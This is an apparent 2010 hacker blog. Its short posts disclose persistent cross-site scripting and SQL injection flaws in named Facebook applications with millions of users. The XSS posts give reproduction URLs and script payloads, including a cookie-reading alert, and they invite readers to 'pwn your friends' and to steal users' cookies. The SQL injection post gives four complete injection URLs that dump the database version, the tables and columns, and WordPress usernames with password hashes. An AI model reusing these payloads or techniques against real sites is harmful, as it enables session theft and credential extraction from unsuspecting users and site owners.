Wednesday, July 21, 2010

Facebook Music app Persistent Xss Vuln

About :
An independently managed application which allows Facebook users to place their music onto their profiles.
It has 547,534 monthly active users

LINK :http://www.facebook.com/?ref=logo#!/apps/application.php?id=2436915755&v=info&ref=appd

Another Xss vuln found :)

The steps are
1.http://apps.facebook.com/stevenlu/?tab=index&display=add

2.http://apps.facebook.com/stevenlu/?tab=index&display=add&method=youtube&confirm&videoId=SgM3r8xKfGE

Once done go on with your xss scripts :D
for example :
">< script>alert("w00t")< /script>


here is screen shot :
Posted by at No comments:

Tuesday, July 20, 2010

Facebook movies by Flixster Persistent XSS Exploit

About :
Rate movies and share what you saw or want to see with friends. Compare your movie taste. Take over 100,000 movie trivia quizzes.
Join over 40 Million people using Flixster on Facebook.
This application may contain content that is unsuitable for the general Facebook user3,446,811 monthly active users

Lil more analysis of this app gave me a path for persistent xss which everyone loves the most :P
Step 1 : http://apps.facebook.com/flixster/quiz/create :D
Do the basic steps and select create quiz from the scratch..

i tired the 2 parameters
">< script>alert("W00t")< /script>
and
">< script> alert( document.cookie)< /script>

which very well works :D
Hope you can pwn your friends now ;)
Few screen shots



Posted by at No comments:

Facebook movies by Flixster(search option) xss vuln

About:
Rate movies and share what you saw or want to see with friends. Compare your movie taste. Take over 100,000 movie trivia quizzes.
Join over [b]40 Million people using Flixster on Facebook[/b].
This application may contain content that is unsuitable for the general Facebook user3,446,811 monthly active users

I tired few xss scripts but sadly few didnt work out...but then i tired this..

[code]">< script> alert("w00t")< /script>[/code]

So here are the few screen shoots vch actually luks dont look like xss ;) your views r necessary :D
http://img27.imageshack.us/img27/1774/xssed.png

and this is a normal search which didnot give me any popup :P
http://img696.imageshack.us/img696/7798/testaog.png
Posted by at No comments:

Facebook Quiz Monster Persistent XSS Exploit

About Facebook Quiz Monster
It helps you to create your own quiz facebook application! Quiz Monster makes it simple, fun and easy!

Vuln found :
Persistent XSS VUln

create your own quiz 1st and insert your xss scripts in the options available there...like for example

">< script > alert("w00t")< /script >


once done go and check your quiz

currently this application has 14,238,107 monthly active users ....and so the attackers can also try to steal their cookies (didnt try but you can)

One such quiz is
http://apps.facebook.com/quizcreator/quizzes/714688/play


Here is a screenshot:
Posted by at No comments:

FB NetworkedBlogs App Persistent XSS Exploit

About NetworkedBlogs App
Promote your blog on Facebook and syndicate your feeds to your wall and fan pages. Join 450,000 other bloggers on the largest community of bloggers and blog lovers on Facebook.

Again this app has 1,712,628 monthly active users

Vuln :
Persistent xss and html injection

Goto your FB acct..add this app and create your blog...the prob is it has a char limit

Here are the few screenshots

1. Xss Inj3ction:


2.Html Inj3tion:
Posted by at No comments:

Facebook politicalaction app Sqli Exploit

The Facebook politicalaction app suffers from sqli which can reveal a lot of info to the attackers.



Here are few codes which i am posting

1.Getting Basic Info :
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2CCONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

2.Getting the List of Tables:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

3.Getting the Columns
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

4.Getting Wordpress user-names and passwords:

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
12 hours ago · Delete Post
Posted by at No comments:

About FbAppz-BugReport

FbAppz-BugReport is a group were we research on facebook apps and we will be reporting the bugs along with POC.
Posted by at No comments:
Subscribe to: Posts (Atom)